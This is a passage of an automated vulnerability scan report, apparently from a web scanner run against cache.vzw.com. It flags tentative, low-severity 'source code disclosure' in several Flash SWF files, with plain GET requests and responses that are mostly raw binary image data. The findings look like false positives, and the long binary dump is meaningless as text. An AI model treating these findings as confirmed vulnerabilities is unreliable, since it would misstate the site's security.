FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................Exif..II*.................Ducky.......L.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................        
       ......................................................................................r..........................................    .
...[SNIP]...

12.3. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 47236
ETag: "b884-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:58 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................    ...    .......

.

..........................................................................................................r..........................................    .
...[SNIP]...

12.4. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2011 16:28:47 GMT
Content-Length: 57837
ETag: "e1ed-4e5d0fbf"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:59 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................JFIF.............C..........
...[SNIP]...

12.5. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 60068
ETag: "eaa4-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:53 GMT
Connection: close

...[SNIP]...

12.6. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 54462
ETag: "d4be-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F........F...........Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................    ...    .......

...[SNIP]...

12.7. http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cache.vzw.com
Path:   /images_b2c/homepage/biz_marquee_verticals.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/homepage/biz_marquee_verticals.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Wed, 03 Aug 2011 16:22:42 GMT
Content-Length: 107857
ETag: "1a551-4e3975d2"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:44 GMT
Connection: close

...[SNIP]...
..8.x......t.J#W.I4...s)..!@&9uYK.....t.^._......9/.4.!)4...2..V.J.?0y.IT....1.SW$..dI!..S.....]q...]..*.k.....n.l.=.R...B..arU.@.!.......>.E..>..KK    .#.XJ.k.|`f...Op
..O..............#e..cJ...S.j$fKYH.-...........x.8.!....NaVy..7.!..:..'...E...M5.if.ViBC.fTz. ........b6......... a.~aV...HHQ...v..$.I.\...<z..2l.|W...:....Y..s.&.(.Idx.Z..i...`..@.u..k........Q[55vgQ.f.AD...(....)........
.i...+.J..3...H..F., ...^.....5-.l^i.R..4,g...&p......X.%.......l@..Z|.2.....)JR(A......l.D"hPMC..N....HX...A.iovf1(..&.P.......j...(..+...`H... ..6(5....{.H.?.<9.h&.2.
..vW..s=P.b.t.5......S`A..s...,.V..\?......TTT..s.d...S.u....`H.youcG.....R.b\..........P...+.'.9..q[.......p...I."....s.F.:..`-RN.va=..k...#...T.    ..]A.YQ.w..?N..I....A.h...t.WHj"V...j........(..$.52ML..F9l.k.?PI../PF)....N...5._../.T.8.Z
.R.f.....UE...mD3.q.se..b4.......~..xf..!.6c..Y.2=C...#L...}.....2.E.D..c..{8>@5G    ..w........!.....".Y.Y...0i    ...po}N.C)....._i.)2...@J@d ..0gg.x.`.+..TI*...]F.<..pD4u..Cs.EJ..yh.TD&2..x.-..t.;..<.UA.L....).]lCE.b.m.2( )..6=1S.1..j.JKF...Q,{.-..1#.D.Z..s..m...../......
.$l.L....,cU.....'......AAOT.
..t..D...iXB..IQ#+.#.-v...Xd...!+UT..h.@..j...<..X..\.*.....y..@.
.r.....Qr.3.....Cs..y..O.QX..&..eMS....P...V.............y.D./...Q..i..t\.........%.I.......HP".(...8cr    $......@@..w..I....o..d nI.n...+N.Y.A.......{.Oe'.44.%'6..j.    .e..~.a..n.(CHa.iQ.t....    .....bHr1    ,.iV>T.43.q.N.T;^.k[.....0    .
...}L..v.}=0..........+7.9.1..\...fNj.2X...#r....j..
MZ..F....D.Y......w.w...j..:;...b...........3.R...+J..w....=F.4sD.....J..R.....{`...zD{.)L..NT.'...M"..;1.B......=0.O$I.r.S.y...lF....li..d.D.W.    ..=}..!.`f.(r,T........Wk....g...D...eF.E"D:a[.m...F.Jv..;.V..n6>...241A....U...A.G../.......e...    ....#..b.P.......C.=4...^..4...._..%j.T?*.....    ...L......H.!...H.a3I.24.....}..&...|.C.L..9...#.s.g.....(......D......#..6..Q......-S;N.yl....6....S.h.2#mKwA.[..1. \..$W.8.j..........*~V............8Yc...h...J./........M[$.I...3jN......."..$.?9...>..}0_..%..]..yl..r.i*....Jj#...@.....-........)#&...m..6e.i...r.r...>...I@....d[..f.....&$I......%.r.2..............CI....#E. ......D,...o...9. .0e..f1.-..w....*(.?...).tJ../..}.....q.A....j...'.>...m.3N..DFUAk........0..G,sS....SH.........41*D..Yw.E.P.........Hc..D    [..KA%4..g.........0.}..JY...$.E........    ..c...Kn..q.6.`C4..*&...XlM...Z.pDe.'!..n4.8..a...h........3....hD.s'..?......5...".o....N...,
3. .......H.D......J.B.`,.........RL..e..l..0+.{a..h$..f......a..w.^.n.u    ...:.c.0.n....yA.YX.
.[v'.>.l<...P.{.^.....(..V....-c.......*...&..........$......+.......G.1,..h .@.w.    .c..]i.....>`....o..n..,.B.Y.,.....#..8u...l.5.f}+......'..-.M...,.......|.""..#.j/m..@0...RG...Q..z......S.d5;..d[0.f.I.    ..0...(....q....,-#...}J.`O...n..6..-....=......@..0...1.zO...A...V.U........:.....OER7..... .....{...`H..N.....4..$.'.c...Y..P..bT.[l.{...f.P......j7.......*H......?...........vah....7.p.@.{yJ.H....Dv..t..6.|>.#U
@S{......".e%
..sv=6...G..#.<......0l..r..x.B.KH../...r:.".QV X..X..........rx...C.zRU........y.......CrG@A=..0..gU2....U.;.k...=\. f_1].{.......6R.......$Y......vs..{...m.:...j...F.C...X....n@......F9..u)..p...J......$....4.;........T....vV".......t..aU.1.....yEu.\...^.y.>0Tm.H..@X.....V..l..`U.......\......$..+    
...^.N.O..D.vE..K......\TZe.. ...u.`.+...H...4.gU.KJDUMEYYFXiN}.-2...D.4d.]z.b....7...9....*..:....G.....:..6...U&.K..'...(....]...wP(ew`v..3...7.........9-?'..%zuy..fh..CNe..>..bE.*......W....2.9.&d....!..&..N..>P.s..K..4W.}.E.-i...o......(x.$.x.-..4.&d..W..E+.".~u8h.p....._wM
..E...`.    #$h..3!..AM.V..P.1.G...8...*.Lu...b..ri........G...!..7...:}..~;..;.|...w0..-.t..@V..MQ..J...sB%...H"Eb.\.t.E*.h.kJQt,o..l;.
.......b6(b=F.(.......(.1.O.i.l..5Vq.@.]..Vih....Y.0/
....#.x=........4.Z..4.Q.'S.e..U...f...P7h.t.u
...u....bo)X..LvV...n.nH=...0~...3..%......Dj..=&<.5.\....5S.<....-.4...:Q..I......~$....U..C..h..M+.C.r>.wF...    .........
D.J.2...L...!.)..u.....C2.Z30..jD.T...1`U.[..Fasv....?....>..u.5DS..L.m..\A-....|...I.6p.N....../p...x.......BI2..y..Efh...>..E..........gIZ~.Q.&&......t..D.%...UO.>.|.xA.<....Jy...cy..$.....7v.S......i.R...ifWg....&#2.7&'u....^..,..U".P..c.....]..DM.t+.._.b{X.P..:..zi...(Y.4.Rbf....:..]t......YF..|#...
....e..:Yj.r....h.c.U..&i.1...Aab@#.W.?
y..sxG<...s#-=loO2..H...I5(6k ...........K...iJ...V6.30X.7B.../]..QQ.L..F...L.    ....ve....(.....=..&......0..UZ..wo."+..TLwH}....o.0.....U.-&i...,.e.4..1.?)..5..o..........._X..."..-bM.wM].....;.7.c..D.J.i.v..m........*..b@..nuk....H#."s..9w........)....[...../....I.v......a.....w....8q......2.......,A...G...5.{..I..2...?....,E.ca{...$.s......!..4...`...H.......K.6{.. .(\[.g.r_..2e.|.&..J..(L..^.Y..P...b.....l..(..o....Y........).r.g5....J....tt.E..........^..6.".|o......L.).G....Q.@....*.........pQ.UBB,BZ...X.[......-......7.TR...1..\..Q.
.....".F......._......J...?.J..!..v..[.o2c.2....VK.q%e.MM#..Rjj.*...]1.M.=.........p..TU...e
...5`)D..3.....1..s../.8.55.Q....k;9...d.....uX[o..M..ss)jE...T ..Xb...4..$...bw..-lQi-7h...0...@.88.#q&&Y.R.C%.._:x@.JR$..D......E!......;.z...u......D.+]E...$%M....m.7Rmkb:/.5..bG5..#.!`
.."........+.......:i^:..jy%(.......Be.......eG.._...>Z!.....9....."..(..Wo8.7.Z.....k...S...?W..,zX........M]:"|t.(.3M70i......o....;....Z.....d.l..#...5E-Q..`..y. ...`nC+sp..m.,S-..e....I....y<E..L.n..g..7m_..\;SA>e-,3V(.....<.)...2F.......8.C..GOG$1..YiC....feEa`..k......Y?.q.......M0.`...X"..[.....F..l..V.}4..Z......Du...SR..^B..C
..>j. 5.YX_|Yt.G...:z...*... ..w..4v............O....tY>:.....-.Q..Pl....R.;...:.^.N.1.....*.@Jca;(...N.}B..6.x....\.5...;..z.. .......ab|..
...?.?.._..?.^#...*..._...H.5..7H..L...C...%...B.Z..    *R...;.....hXD.I`.1h.;....U...D...{\R..j.N.#4....j..    ..$(.5.....w.x..f..T...u(5.....#:B.....8.X.[(...{.A.eHBgM.`H*.T...&...q....m.......T..O.P!..8..9c!..
v.....$.b$..'-...a.X.....-...7...#...{hp.._|<.^..N.M....)b.V..>H"..G.:UM.29...G..T..h...S~k.........X..i.>UQ.<.6.Ac.C..[}..i+..IK..L6.'n....U..9<....,_Y.T..#...~P....qz.Y..(..e.4..kWe*B....$...Z.'....4......b.q.!..DU5*...ZF..].f_|"X.C.w7..(F...C.N.l...$jg.....<D54M...T.4|.W.pz...c..q......E.k..J7C.c.Z.V.Fy...2.mm...c..2..#..YQA2......l...T.......%..6J.,...u?I'...$...h.K.R._gV'q..oc...%$w.G..T...c.=1-$...:{.y$.........+N.O.3....xa...,..~p.H.....F...o...> I4q.`.    ...=N2.=.#..o6..!.........x..".7Q.n..|...<j3.>.w...j4t..bP.'K6..z.o^..j..L.JT....,.. .`z.........u..c! .[...c...0..uX.....w..1.{..Y...uT\O..x.q....h.    ....'......w.'..t7.A..B..4....`    ....{..}k..of.?c....U...{.....XY..6..7.A.CF...+"..PO.9.....!..h"..L....~S...;\".y.....C.....&2..?.==Z8.PXe(..%W!..1b...2...KB[.Dz(!.n.....S@.+.lY.!.q...%C@\..s..{.......hcJ.J.u...H....g......}5.._F..v~.rv..u..0U...*..UH.U.("...gs..1g..0cf.....?..O........$9..H.....3...S.F8{.}.i....x..Yt.....#.C.!..C......xrk.-......&....s.Y..~}.8...........U..K.......y.Mb&...3C.......m~(..:.d...}...v.9......gY..y......,...wu....'....Va.....~.M.,6.W.X....f^.....h.4......    B7.+.?@&.2..    ..W.....@d....G-.F.:.k6.....j=
a....p.."w..w...=s.mZ..5...x[.......    ...
..../.{...co.....n...].w<.;.....\8.n8..J.T.|..<..jx....'.6......[.....&&y......{....LG....^e../.|.....0..+    ...2..C.c..J,..e.?...{...%0.d......`zS.BXJ.,6S}.....W....s.~-...W.nd[.[.hfd.B.bc...k.s.r.    .CI...H.    .W..;....z..I    .L..h:....NS....1..|`.9...W.M.=...7..%...0^sY`....z..%.....M.....Y|..J.../.9.../...>.>b7-..SI}...<........K.7.F.C:.W...Q!,.ve..~..PM(C.......(V..CA|4UK.....QG...X.....H.y.`...........k..K...Su...`p..(...bY.sy&...2~.....'9.8..A.7.s.`.e...uS...u.v.Jt.H..R...~..5Xe....l.C....e.
m...h.....    .,+...R.D..(d.7^......Ac`..5...aG.V...6v.A.....h.!....c......Q....O..(.r.......<......"B...B.....#.hf.L8...Y...T..k    .p......?.\. .t...fr.F?.#VG.8o.74.~<.v.......N....|X.....R7.Q...:..._...'5...Y^.Q...p.."v...I....s.    *.R.<......s.{....4.|......    ...p...<}.r.e{.#.I..... Z...U..sk.7..%..r..c-+
.Y........_.....(.J.4e~.....T.....PI.6.2.#........<.d. @q. ........G..7..hpS&%.
.3..M.I+...8..,.A3....JM.'.a..k..L.+&Qt.#.D..A."f..D..{...2.......
.....o.D>0...l.|}'.q..&.......3s.u>..#O.{.}.>._.R..;..8...v(...!.}.U...,.t.3..B.._JD^.}.`......^]..9    ...O-.$,(.W...1.g.m.$.....C.m.j...|L6}...m..Qu
~!eN.rj........w.fai..uWn...~..G...]....U.$o...e.....#Fx^0../.r..fG.%?NJe...(.=|.......z..#|.....IM.z.i.%......v.....%j5.S..z.23...>&..m.\.RU...e.^&....0...6J.....x2Y.
..w..... .OL\e.....>.`G].........6dg...........E.5....e.h.#e......*......P...//S......hRz..KB....3...\.[j=...Y....DM}?..B...\Z..k|{..I..'E.T..k..,%.-....9...I.YZp.".....U..1....}^...."......).(..."...H.....
f.[....8.t....>=.y9...E.1...B~Y.8...J...`.....1K.1_.........<w...B.N..ur......'^......v..................T.%X..j..L....q).!p...O.?....9c~?}.:1...Y$VV.{@.]..,.......nkHS.~<..`...f..7.l*W......yL..../...r....D..k.{..mWsX.7V...j......o...J..M.z...M...L{...?....;Xu..=..k ?6.....i4v0..r....e......O/0^~.$G...t.TbWM..$...9..D...Hg7^..kq...`.n.a2U*......ciA...f.#P.wu...>....Lg)u%.j.5.1Hv..7E......z.&G.95gl.3L.g.\...vI.p..m....+.\..'...+i(n.
a..*.D....qG%z.....k...$.jx.....T. 5..j...1.u....SLE)u...c.mk.6.Z.    ...>.P...uJ.|.S_.;...>...j9:R.#...L...K..WG.t...C6_]|......:...u.$..*.-.d.. !. .Q{...D'..o.G.....[.........]..!.~..L.|...^>.~m.y..me.I'.............;X    .....MH....h\.<d.. _...<U=..Z..Je..=(V...[$1.T.O*...........an.>..aPym......p..q?...BO4...zI..q.5..5...dl.._.M..Z[Y.L.XX1q)..*.-.H...0i.P...a....a.....b...=.U
>U...q..........l.xPO..P.b._.F..J....(.G.(.~.......YEQo.q..<...R...}R...(aZ
0...z[!.|K.|3.(wi^...)dXEEL..!.....!.k......1..=s...y:..(...L...$6.
...Ba..7. .pg...<..,....44...4c..@.#Q../U.P..n,..%...?.2.v..TQ........d..x.^...|).".-6....~j...w.l....x~..T.&a......I....    J.    )u... ....:..1q.....@7v.6..w.|......AZ...` .PXE.n..d.^....|p..W.Ym..^...):e@.8..6/..E...bh`...O.y6Q...?v...U.[.s..#.G...    .....)mf.#.+.#.:CAr!....#G.7H.Od|../.j.....Z,;.../..O....F..g.
-.K.{.....4w...y.....].F..2...X.....j./...A..E..+/........{.0w....ZF..<2....=i.WR....CR.......or...33.Z.Os...f....(.....x0*..Tt'..C.Cu.r...i.3.;J.W.G.u.z...(<..I..*.t..,.......Y.n.........Kj..........Fx.v.S...cnJ.'\..X.....d...3'b<M.m(.g....|:...9..V....4...ms2...y.@..O9%B.~u.d(............U^u}m.....^.!....F.f8..u.Y..g......9.<..|.$..q.iP..k....O    ......kLE../....]..Y.I..f.....y.m....n.bc.]....<.f.....@.C.i}.eJQ.pF...$|......Y........."BN.m....3......C.{.,.l..t%7.,/......y.I1'.o..p..@..$.CDC....9r.P(...K)k...@..i.K.......K....75{H...c[+\..G.{....._n%YY%......f$X..    .>'...$$.g..w.c.....Z.Mi..s.....[l....I.C.1./.x.....P.,B;d.i..._$..../...:d..<%.9.&.u.D..:.i..S.....^..4.....C.R $!.:.s...N...o...qGc&Kx0.M..........d..8@..I.Z.*.<..T|a`.y.N.....V...";.%.Z.n..?X7H\....H..S....gm_8...y(fP..s%.+...w....D.....R`... _..S.......f$1"..f...F.Z..Mi.cb..O..3.
.6./-.w.G<%.....k..?(P..TJ0.t_S.x..F.xY...G.....k."z.8.    .xK..R...o...A.0]..."Xj....a..w{J......J.}K...}v......<&.....:<U2....R.8.+D..z....Yw...~D.
U..)....j.._........V...c'.....8.    ;%f...7A.`.l...[...O.%.(.5......o.-~..EE.*T:PU......o.....4..U..O.4..x....e....A(..c..\I.%...pH......d.....m.....H.=..Gi.@.I.$.............Qp.....+M..~5B..D...M..k..ua<.m...D.*..%..r.........H>.T.>.).:...W.hKg8..6..?......%D......s.....e^..f^..    .I}.qp*.~w.2.\.......`...,O...r".B....^.=7...2ec.....Q..._S>..OI..v9..t
.c.
...k..*..g......I..hq.s6..EI..{...:.*.".j.x............'(.0..i.9.....?...b.......w.....r.^v..y..l:b..Yl..........X...7Y.v..l4G.....V.r2M...e...N......s....H.Gc.....<:............&.........H..]^X..g.%*k.....#...A....t!....{y..X'....(......@..}....hxpI....A.t....%.].m0........W;!......MR....+..".W.Q<z..t..u.[....D:..|.]......:.}.a..o.uTd.e.4c.N<.p.....r..]DOJ...#.C............\.2W...?..,....w.~.Y............1.....].X.9.,=.3.....@%q...T.....~..z.....m3;9......d.
.0.2OV.5..~.....pP.M.yn....q.rW..-.I.x...>~...D.35.}W*    ....J:..+.'.(R}r..K.C.._.iVv..C=....<.....N...G.
...e.xV.?.L...o..N.a.(.....7.@...>.!....9v.=4R..$.3.6.]]. .o..R.......^>..%._no%...........).....2...w.|3uN.L.7Dk.2.......n.....h....T.....@..$9vv......|.....\..`.."xr.s.....Fl"[....P.gE..l...`..K....`....L........@..o...jB6.......)~3x>{9N%.,..t2..q...f.x.G-.v.>..*.DW...b./..6..gE..*.....@.>.GoN......ltE..n    ....*..T..5...2...&...3k9.
.4.....tm.1.,..g.3.c..$z.. R......LW..&.-Z.t....X..53A..B....L....N.2!}p..o.N,..>\...fE.2...K..._...c[..+.?..6[..L}|..F.{.h....0    ...L..O...;."...Y:.~c.R..1e..ml.....Nk.g......Y.........#...].(.,...)._T1......^...o.+.;..s.S..#T.3.9?...Z.5$..]dFOw.#N}Q..V.>}.L.. }......W.XG.......F..<...k.....8.kR?K....a..6M...Xk.bz.....;;?.4..-..p.^1v.< ..X#.LC.y.<..<#...M.g.f..xda^.^}\.....j...no^.[.X.2.IB...i.X..~.D.|    ..C...P..W.._]U:...B&p......4..m.. .....1..Q|..K..1r.hM....xMT[Shh....O..;..Qd..:.G.0.....}g;7...H........S..0.....`.bQ.g....jc.2..2m.#..<..$.....d{;..f..@.j<..@...d|..d...^..F..-V@wD..Y...O....!6....O...X`..rU.?    ....b....D...BI.M:...7.t......;..........,.....l[......*5./....L.&%......C....].....3%..v.O|.x.Y.5    ....I....M..H/.c.k\...m..."*]..l..2+.;x....+..E..............w.*L.........H.e.O..4G..\Kh.FI.{..;W......(.T.E...d43...uu....=T...
.v..vX...y.....q*.?....w.....G.....1.......\A+O."+u...o...:.z.BCz~".....kes...S.Oz...4...$. .+...d.i.g^.....VC..[..Z..>..BO...s..M....;(\.F.....1.D....m0\.~....|..4#Q.YY,.r..&..\y..77..vi......S=...G{$....e.....nBGT....jk.............\oCy..<.{...n......?W..Qe.].]....lH.af.........:...    w;."....yC.dY...G$WH...E.....N.Os.J...nJT..........I.7r..u....-....Bo2B....kp.v2J..nB...sC..9.A.*....&....\..9m...&o.,iI.......O[_._H~...$V}....`.<..i........D..#..=.......8..S.?&.<yX...@.DW.=......&Q...Zt.d..+._....j...F..^....t.....u,.......n.......r.......>.[]..n-.b.X..(.9..q.Y.Y
....'.@8R2.......l..y....*.d..ZF....d.R..#"..#...~.v...._....^.'.. ...x...+(    .1`...A.7.~>..?....s..
.D(....*...q......Y...I..,...Je..=......c.2....SuG.[q.4I....|.]N...'...Ao........Z}.3.j.Y..
...X\y..uhL.Eh..../.....<..9.q....L|......M..$...b7......Z.?... .    -D.i....}A].t..].    b..Q..GC...".kN........Y$..H..N....,e....%.BNn.yr...!....~8^%.4M......u..N.~.S.Fz.$...+..t<.:1.e/b.....:.T..!    G..qM.._:7hO..B:..E[eEu.1g~.h.]tJ]..M...........    ..!...l.....)D_...g.U]..<..r}(.f..3C.X..".Jk.;.g2,.*.6'.8g.NqeR..!,1).h......h...W?.@6.....>c.\.L..+...."..q...OGG.(....w....t]...)...%......TL.H9.l...>..xm..|.r..(|.V.....@&O.h.F..(j....-../.R>.Q.G..Fb8>.....E..
5....Nz...^.m..L.n.'..B....[.A........s.>....V/$..}O.*..147M..N...........K..?...?!.P......-buh8..G.....i...H..+b........8..s...b^..:.H9;.
..u>K...d9.8...X.L....`z>.f..bs...q..2?.Z.@..U......4...w.....+...
.....nFF,.&!:p..OC!....*i...A]=...k...).Y..J.....c.d........yDe.....A...c....yp.:......|G...d..f......9......R..u.K..h.u?j........L&.P....8..i..;.
q....d`.l..............+./..E..{.$.w....*.+..i{....h@.e...1$..>..T.w....qc........S.p.I?...h.0..B.....).g...mM...*./..9.....
.a...a.HK3U.;...+....f..j+N......#.r...qf......1.h}^....2.E....o(M...J&.............]......T.5...i".)..n..&.A...f...*.....sT"........%.WRW?.).0....D.7nR..u..a.:...+.K..F.'...c..=.U.vH.P..D....U..6G..]w...}..E...94....p....BR.).........ET...PT..S.p.l...{.lr.^|...?.Y...Lm.?..gT..0s..MN..pH.NEFJY    ...A......Wp..D5..w...X.I..C...`...>J-.Ig?y?n.    ....{...\..
...}.YQ.9 .M....t..S!.W.....%
A..T.b.(Nh....W.;m.....R.....E#K...5.].?.'[.......!..v..=.o.T..<.]k....^.......0(.\J...>.C}.cq(....q^.B._..8.......t..UpTeN[.7...%...*zp.g38......&.n.b.6<...........#.^....7.....hoK.x.[n..8...l.bvW..ae|^f.@.%.v..z...7C....I..q+.8m].0$Oae.........I.....Q_..........8...V....F...z.@....e..9...}..>..h1............ ....Y........%....o...m..s......C...HR....B.Bobc.....S.}ky..x.M.g)I...k.W.`fJ}
.....j.....it.X..D+g....).>.C3z.....3..x.pr$.*..@........m.......G...J...?....$wB.g..X!..*...ts../.b..?..;.    g!.>gUF...^y.J..73.4.yW.....|..2.|4....|^...8)...V...~r+.E...Oe.Ix......R?.. .(..MJ..xE..[..mD.3........V..m.`.2.>'.V.....{..u.2........h&.:...O..........k.Dy...\^w...#....<...BE.8Zb..X.....i.l............=.D}....e.~.386..!.....J..N.H....X.6..    r.Z.....Y........`..:...%..Z*j*....ry...|......'`...|6. M.ka.....!./..Al
/......,J..A..C...W.......1]...Fv.u..}_I..>...QVP..
.-.........@.......7.x.......'.r8.C.V-Y...PkI..5..N..$ec}
...%j..J>....b.^...r<B(.Rx .v......y.......1.>ag+h~,..P...S...%.
O?<Z.....f..&..u..........)..../....T,gaL...e..P.J.1,..W.R.4*.i.Tv...j...J..9_P....C....>...|...a.....{/d...
^..(....p..$bH.DsNw.....L..~...W..5..1^i...&.1
0..l..c.?.}...[l.......N...-M....7DL{.......x(|....R.}x..v=x.<..W6..-....k....QA$.>.Y.e.~.........
.B....&:...dkw.W'.....F.    '>...G...!+f..oO..OU9....hk.y.,..aE^...'.Q. ..
....Z.I...%&;...........?t7..i.Ai....Rq 4.#.<.Q....(..Zt.P.-.n...\4.0..../...._.&....B
.2.Z;s....
